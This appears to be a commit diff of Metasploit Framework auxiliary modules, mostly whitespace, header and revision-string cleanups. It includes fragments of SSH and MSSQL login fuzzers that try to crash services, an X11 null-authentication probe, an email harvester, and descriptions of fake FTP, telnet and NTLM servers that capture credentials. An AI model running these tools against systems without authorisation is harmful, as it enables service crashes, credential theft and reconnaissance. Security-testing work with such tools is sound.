cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SSH version string with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -73,16 +73,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version
"SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1"
end
modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
+31 -31
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Corruption Fuzzer',
@@ -31,11 +31,11 @@ class Metasploit3 < Msf::Auxiliary
# A copy of the mssql_login method with the ability to overload each option
def make_login(opts={})
pkt = ""
idx = 0
db = ""
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -50,42 +50,42 @@ class Metasploit3 < Msf::Auxiliary
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
@@ -93,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -113,34 +113,34 @@ class Metasploit3 < Msf::Auxiliary
pkt
end
def do_login(pkt,opts={})
@connected = false
disconnect if self.sock
connect
@connected = true
resp = mssql_send_recv(pkt,opts[:timeout])
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_login
cnt = 0
fuzz_string_corrupt_byte_reverse(pkt) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_login(str,:timeout => 0.50)
rescue ::Interrupt
@@ -151,12 +151,12 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
modules/auxiliary/fuzzers/tds/tds_login_username.rb
+30 -30
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Username Fuzzer',
@@ -31,16 +31,16 @@ class Metasploit3 < Msf::Auxiliary
# A copy of the mssql_login method with the ability to overload each option
def do_login(opts={})
@connected = false
disconnect if self.sock
connect
@connected = true
pkt = ""
idx = 0
db = ""
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -55,42 +55,42 @@ class Metasploit3 < Msf::Auxiliary
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
@@ -98,15 +98,15 @@ class Metasploit3 < Msf::Auxiliary
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -117,27 +117,27 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
resp = mssql_send_recv(pkt,opts[:timeout])
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
# capped at 16-bit lengths
next if str.length > 65535
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_login(:uname => str, :timeout => 0.50)
rescue ::Interrupt
@@ -148,12 +148,12 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
modules/auxiliary/gather/dns_enum.rb
+20 -15
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,28 +9,28 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require "net/dns/resolver"
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Enumeration Module',
'Description' => %q{
'Name' => 'DNS Enumeration Module',
'Description' => %q{
This module can be used to enumerate various types of information
about a domain from a specific DNS server.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0532'],
]
))
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0532'],
]
))
register_options(
[
OptString.new('DOMAIN', [ true, "The target domain name"]),
@@ -42,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false])
], self.class)
register_advanced_options(
[
OptInt.new('THREADS', [ false, "Number of threads to use when using ENUM_BRT, ENUM_TLD, and ENUM_RVL checks", 10]),
@@ -248,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary
end
a.delete_if {|x| not x.alive?} while not a.empty?
end
#-------------------------------------------------------------------------------
def bruteipv6(target, wordlist, nssrv)
print_status("Brute Forcing IPv6 addresses against Domain #{target}")
@@ -493,7 +498,7 @@ class Metasploit3 < Msf::Auxiliary
dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS'])
end
end
if(datastore['ENUM_IP6'])
if wldcrd & datastore['STOP_WLDCRD']
print_status("Wilcard Record Found!")
modules/auxiliary/gather/search_email_collector.rb
+16 -12
View File
@@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -6,22 +9,23 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/http'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to locate email addresses for"]),
@@ -29,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptBool.new('SEARCH_BING', [ true, 'Enable Bing as a backend search engine', true]),
OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]),
OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]),
], self.class)
register_advanced_options(
@@ -60,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#Search Yahoo.com for email's of target domain
def search_yahoo(targetdom)
print_status("Searching Yahoo for email addresses from #{targetdom}")
@@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#Search Bing.com for email's of target domain
def search_bing(targetdom)
print_status("Searching Bing email addresses from #{targetdom}")
@@ -105,15 +109,15 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#for writing file with all email's found
def write_output(data)
print_status("Writing email address list to #{datastore['OUTFILE']}...")
print_status("Writing email address list to #{datastore['OUTFILE']}...")
::File.open(datastore['OUTFILE'], "a") do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@@ -123,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
@proxysrv,@proxyport = nil, nil
end
print_status("Harvesting emails .....")
target = datastore['DOMAIN']
@@ -139,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
emails.each do |e|
print_status("\t#{e.to_s}")
end
write_output(emails.join("\n")) if datastore['OUTFILE']
end
end
modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
+4 -2
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
modules/auxiliary/scanner/dect/call_scanner.rb
+18 -8
View File
@@ -1,10 +1,20 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::DECT_COA
def initialize
super(
'Name' => 'DECT Call Scanner',
@@ -13,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['Dedected', 'http://www.dedected.org'] ]
)
)
register_options([
OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
], self.class )
@@ -23,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
print_line("Time\t\t\t\tRFPI\t\tChannel")
@calls.each do |rfpi, data|
print_line("#{data['time']}\t#{data['rfpi']}\t#{data['channel']}")
end
end
end
@@ -34,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
while(true)
data = poll_coa()
puts data
end
end
end
=end
@@ -43,9 +53,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("Opening interface: #{datastore['INTERFACE']}")
print_status("Using band: #{datastore['band']}")
open_coa
begin
print_status("Changing to call scan mode.")
@@ -73,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
stop_coa()
close_coa()
end
print_results
end
end
modules/auxiliary/scanner/dect/station_scanner.rb
+21 -11
View File
@@ -1,10 +1,20 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::DECT_COA
def initialize
super(
'Name' => 'DECT Base Station Scanner',
@@ -13,29 +23,29 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['Dedected', 'http://www.dedected.org'] ]
)
)
register_options([
OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
], self.class )
end
def print_results
print_line("RFPI\t\tChannel")
@base_stations.each do |rfpi, data|
print_line("#{data['rfpi']}\t#{data['channel']}")
end
end
end
def run
@base_stations = {}
print_status("Opening interface: #{datastore['INTERFACE']}")
print_status("Using band: #{datastore['band']}")
open_coa
begin
print_status("Changing to fp scan mode.")
@@ -59,13 +69,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Switching to channel: #{channel}")
end
sleep(1)
end
end
ensure
print_status("Closing interface")
stop_coa()
close_coa()
end
print_results
end
end
modules/auxiliary/scanner/finger/finger_users.rb
+4 -2
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
modules/auxiliary/scanner/ftp/ftp_version.rb
+4 -2
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
modules/auxiliary/scanner/http/cert.rb
+3 -2
View File
@@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@@ -6,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/socket/ssl_tcp'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
modules/auxiliary/scanner/http/enum_delicious.rb
+6 -4
View File
@@ -9,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/http'
@@ -18,11 +17,14 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages. },
'Description' => %q{
This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7206 $'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
modules/auxiliary/scanner/http/enum_wayback.rb
+1 -1
View File
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7206 $'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+8 -3
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -27,16 +31,17 @@ class Metasploit3 < Msf::Auxiliary
requires either Basic, Digest or NTLM authentication.
},
'Author' => [ 'et', 'patrick' ],
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
[ 'MSB', 'MS09-020' ],
[ 'CVE', '2009-1535' ],
[ 'CVE', '2009-1122' ],
[ 'OSVDB', '54555' ],
[ 'BID', '34993' ],
],
'Version' => '$Revision$'))
]
))
register_options(
[
modules/auxiliary/scanner/http/options.rb
+4 -3
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -26,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['CG'],
'License' => MSF_LICENSE
)
end
def run_host(target_host)
modules/auxiliary/scanner/http/sqlmap.rb
+12 -3
View File
@@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -7,12 +17,11 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::WMAPScanUniqueQuery
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'SQLMAP SQL Injection External Module',
'Description' => %q{
This module launch a sqlmap session.
This module launch a sqlmap session.
sqlmap is an automatic SQL injection tool developed in Python.
Its goal is to detect and take advantage of SQL injection
vulnerabilities on web applications. Once it detects one
modules/auxiliary/scanner/http/ssl.rb
+3 -1
View File
@@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@@ -6,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
modules/auxiliary/scanner/http/svn_scanner.rb
+5 -3
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -21,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Subversion Scanner',
'Version' => '$Revision: 6485 $',
'Version' => '$Revision$',
'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported',
'Author' => ['et'],
'License' => MSF_LICENSE
modules/auxiliary/scanner/http/trace_axd.rb
+1 -3
View File
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -25,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Version' => '$Revision$',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
modules/auxiliary/scanner/http/web_vulndb.rb
+5 -2
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -8,7 +12,6 @@
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@@ -24,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 7629 $'))
'Version' => '$Revision$'))
register_options(
[
modules/auxiliary/scanner/imap/imap_version.rb
+4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+4 -5
View File
@@ -11,7 +11,6 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SunRPC
@@ -22,11 +21,12 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'SunRPC Portmap Program Enumerator',
'Description' => %q{
This module calls the target portmap service and enumerates all
This module calls the target portmap service and enumerates all
program entries and their running port numbers.
},
'Author' => ['<tebo [at] attackresearch.com>'],
'References' =>
'Author' => ['<tebo [at] attackresearch.com>'],
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://www.ietf.org/rfc/rfc1057.txt'],
],
@@ -83,4 +83,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
modules/auxiliary/scanner/nfs/nfsmount.rb
+3 -3
View File
@@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'NFS Mount Scanner',
'Description' => %q{
This module scans NFS mounts and their permissions.
},
'Author' => ['<tebo[at]attackresearch.com>'],
'References' =>
'Author' => ['<tebo[at]attackresearch.com>'],
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0170'],
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
+1 -1
View File
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
This module attempts to retrieve the sid from the Oracle XML DB httpd server,
utilizing Pete Finnigan s default oracle password list.
},
'Version' => '$Revision: 6876 $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],
modules/auxiliary/scanner/pop3/pop3_version.rb
+4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
modules/auxiliary/scanner/smtp/smtp_version.rb
+4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
modules/auxiliary/scanner/telnet/telnet_version.rb
+4 -2
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Telnet
modules/auxiliary/scanner/x11/open_x11.rb
+3 -3
View File
@@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary
# X11.00 Null Auth Connect
sock.put("\x6c\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00")
response = sock.get_once
disconnect
if(response)
success = response[0,1].unpack('C')[0]
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
else
# X can return a reason for auth failure but we don't really care for this
end
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
end
modules/auxiliary/server/capture/ftp.rb
+2 -5
View File
@@ -9,23 +9,20 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: FTP',
'Version' => '$Revision$',
'Description' => %q{
This module provides a fake FTP service that
is designed to capture authentication credentials.
This module provides a fake FTP service that
is designed to capture authentication credentials.
},
'Author' => ['ddz', 'hdm'],
'License' => MSF_LICENSE,
modules/auxiliary/server/capture/http_ntlm.rb
+2
View File
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[
'Ryan Linn <sussurro[at]happypacket.net>',
],
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'Actions' =>
[
@@ -49,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ])
], self.class)
register_advanced_options([
OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]),
OptString.new('SERVER', [ false, "The default server to use for NTLM authentication", "SERVER"]),
modules/auxiliary/server/capture/telnet.rb
+11
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Fake Telnet Service - Kris Katterjohn 09/28/2008
modules/auxiliary/server/file_autopwn.rb
+1 -3
View File
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'rex/exploitation/javascriptosdetect'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@@ -21,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'File Format Exploit Generator',
'Version' => '$Revision: 8210 $',
'Version' => '$Revision$',
'Description' => %q{
This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt.
},
modules/auxiliary/spoof/dns/bailiwicked_domain.rb
-1
View File
@@ -14,7 +14,6 @@ require 'net/dns'
require 'racket'
require 'resolv'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
modules/auxiliary/spoof/dns/compare_results.rb
+40 -30
View File
@@ -1,12 +1,22 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/dns'
require 'resolv'
class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'DNS Lookup Result Comparison',
'Description' => %q{
This module can be used to determine differences
@@ -22,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jul 21 2008'
))
register_options(
[
OptAddress.new('BASEDNS', [ true, 'The DNS cache server to use as a baseline', '4.2.2.3' ]),
@@ -30,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('NAMES', [ true, 'The list of host names that should be tested (comma separated)', 'www.google.com,www.yahoo.com,www.msn.com']),
OptBool.new('CHECK_AUTHORITY', [ false, 'Set this to true to verify authority records', false ]),
OptBool.new('CHECK_ADDITIONAL', [ false, 'Set this to true to verify additional records', false ]),
], self.class)
end
def run
def run
base_addr = datastore['BASEDNS']
targ_addr = datastore['TARGDNS']
check_ar = datastore['CHECK_ADDITIONAL']
@@ -44,27 +54,27 @@ class Metasploit3 < Msf::Auxiliary
names = datastore['NAMES'].split(",").map {|c| c.strip }
recurse = true
results = {}
print_status("Comparing results between #{base_addr} and #{targ_addr}...")
base_sock = Rex::Socket.create_udp(
'PeerHost' => base_addr,
'PeerPort' => 53
)
targ_sock = Rex::Socket.create_udp(
'PeerHost' => targ_addr,
'PeerPort' => 53
)
)
names.each do |entry|
entry.strip!
next if (entry.length == 0)
req = Resolv::DNS::Message.new
req.add_question(entry, Resolv::DNS::Resource::IN::A)
req.rd = recurse ? 1 : 0
buf = req.encode
print_status("Querying servers for #{entry}...")
base_sock.put(buf)
@@ -72,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
base_res, base_saddr = base_sock.recvfrom(65535, 3.0)
targ_res, targ_saddr = targ_sock.recvfrom(65535, 3.0)
if !(base_res and targ_res and base_res.length > 0 and targ_res.length > 0)
print_status(" Error: The baseline server did not respond to our request.") if ! (base_res and base_res.length > 0)
print_status(" Error: The target server did not respond to our request.") if ! (targ_res and targ_res.length > 0)
@@ -81,14 +91,14 @@ class Metasploit3 < Msf::Auxiliary
base_res = Resolv::DNS::Message.decode(base_res)
targ_res = Resolv::DNS::Message.decode(targ_res)
[base_res, targ_res].each do |res|
hkey = (res == base_res) ? :base : :targ
rrset = res.answer
rrset += res.authority if check_aa
rrset += res.additional if check_ar
(rrset).each do |ref|
name,ttl,data = ref
@@ -104,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary
when 'TXT'
data = data.strings.join
when 'CNAME'
data = data.name.to_s
data = data.name.to_s
else
data = anst
end
